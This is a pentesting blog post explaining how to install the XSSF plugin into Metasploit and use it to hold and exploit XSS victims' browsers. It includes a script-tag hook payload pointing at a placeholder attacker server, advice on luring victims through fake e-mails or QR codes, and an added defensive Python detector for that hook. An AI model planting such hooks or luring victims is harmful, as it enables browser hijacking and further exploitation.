[Pentesting] Update - XSSF - Metasploit Framework (MSF)

This article is aimed at pentesters / IT security auditors with "high technical skill"; for this reason I wrote it in English.

XSSF is an amazing framework developed for use within the Metasploit Framework. It allows you to manage the victims of a generic XSS attack and hold an already existing connection open in order to allow future attacks.

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing and lawful research purposes. [by XSSF at GoogleCode]

Quick Installation

Install XSSF into the directory where you have MSF installed, then load it from msfconsole, like this:

Typical MSF folder: /opt/metasploit/msf

$> wget http://dev.metasploit.com/redmine/attachments/596/XSSF.zip
$> unzip XSSF.zip

Copy all the files extracted from XSSF.zip into their corresponding MSF folders: data/ lib/ modules/ plugins/

$> msfconsole
msf > load XSSF

New commands are available:
  • Simple Script/HTML execution (XSSF auxiliary modules) on targeted victim or group of victims
  • MSF Exploit execution on targeted victim
  • XSS Tunnel with targeted victim

Once you have loaded XSSF, you are in a position to infect a victim with an XSS attack; for example, you can use a fake e-mail, a QR code, or whatever you want to reach your goal.

Example of XSS Attack:

<script src="http://IP_Server-MSF:Listen-Port/loop?interval=5"></script>
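
A defender-side check for the hook format above, as an added example that is not part of XSSF or the original post: it scans stored or submitted HTML for script tags whose source is an external host serving /loop?interval=N, and copes with typographic quotes around the URL. TRUSTED_HOSTS, the class and function names and the sample values are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts this site legitimately loads scripts from (constructed value).
TRUSTED_HOSTS = {"www.example.test"}
QUOTES = "\u201c\u201d\u2018\u2019\"'"  # typographic and plain quotes


class HookFinder(HTMLParser):
    """Collect <script src> URLs shaped like <external-host>/loop?interval=N."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag/attribute names and decodes character references.
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self._check(value)

    def _check(self, raw):
        # With curly quotes the attribute value arrives unquoted, quotes included.
        try:
            parts = urlsplit(raw.strip().strip(QUOTES))
        except ValueError:
            return  # unparsable URL, e.g. a malformed IPv6 literal
        host = (parts.hostname or "").lower()
        if not host or host in TRUSTED_HOSTS:
            return  # relative URL or trusted script origin
        try:
            port = parts.port
        except ValueError:
            port = None  # non-numeric port, such as a placeholder
        interval = parse_qs(parts.query).get("interval", [""])[0]
        if parts.path.rstrip("/").lower().endswith("/loop") and interval.isdecimal():
            self.hits.append({"host": host, "port": port, "interval": int(interval)})


def find_hooks(html_text):
    """Return one dict per suspicious script tag found in html_text."""
    finder = HookFinder()
    finder.feed(html_text)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    # Constructed sample: a comment field carrying a hook (192.0.2.10 is a documentation address).
    print(find_hooks('<p>hi</p><script src="http://192.0.2.10:8888/loop?interval=5"></script>'))
```

A match only shows that the markup has this shape; the path and parameter name are taken from the single example above, so treat a hit as a lead to investigate and keep output encoding and a Content-Security-Policy as the actual control.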

UPDATE (04/10/2011)
I received a tip via Twitter from user @X0x1RG9f, who gave me the correct URL of the maintained version of XSSF.

Demonstration videos

Now you can watch some amazing videos showing how XSSF works:

1. XSSF Android file stealer

2. Launching MSF exploit through XSSF (CVE-2010-2568) 


XSSF can be downloaded directly as the latest packaged version from the download section. Using the SVN repository is a better way of downloading and updating XSSF, as the SVN trunk version is always up to date.

Last stable version: XSSF-2.1.tar
SHA1 Checksum: 6db5d579ad0a709b7671001a3e089b2a4c2b1fdb

Source: XSSF to Metasploit Framework | XSSF Google Code Project

For Spanish readers, I recommend the following article, "Exploiting with XSSF" [Spanish language], or this other one, "XSSF+Metasploit+Ubuntu 11.04" [Spanish language].
